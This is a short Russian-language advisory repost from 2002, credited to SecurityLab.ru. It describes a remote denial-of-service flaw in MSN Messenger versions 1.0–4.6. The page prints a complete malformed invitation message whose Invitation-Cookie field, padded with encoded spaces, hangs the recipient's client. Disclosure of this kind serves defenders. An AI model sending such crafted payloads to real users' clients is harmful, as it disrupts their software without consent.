Asechka.Su
Asechka.Su

Удаленный DoS через некорректный заголовок Invitation-Cookie в MSN Messenger

Понедельник, 5 августа 2002 г.
Просмотров: 457
Подписаться на комментарии по RSS

Msn Messenger - популярный интернет пейджер от Microsoft для Windows систем.
Уродливый запрос, содержащий закодированные символы пробела (%20) в поле Invitation-Cookie, посланный удаленному пользователю, может привести к зависанию клиента Microsoft MSN Messenger.
Уязвимость обнаружена в Microsoft MSN Messenger Service 1.0-4.6
Пример:
MIME-Version: 1.0
Content-Type: text/x-msmsgsinvite; charset=UTF-8
Application-Name: Remote Assistance
Application-GUID: {56b994a7-380f-410b-9985-c809d78c1bdc}
Session-Protocol: SM1
Application-URL: http://www.microsoft.com
Invitation-Command: INVITE
Invitation-Cookie: 54902160%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
Session-ID: {8B1BE64F-4019-489D-B1A3-EC0BA993651B}

Источник: SecurityLab.ru
© Asechka.Su, 2024
Работает на MaxSite CMS | Время: 0.2014 | SQL: 12 | Память: 0.77MB | Вход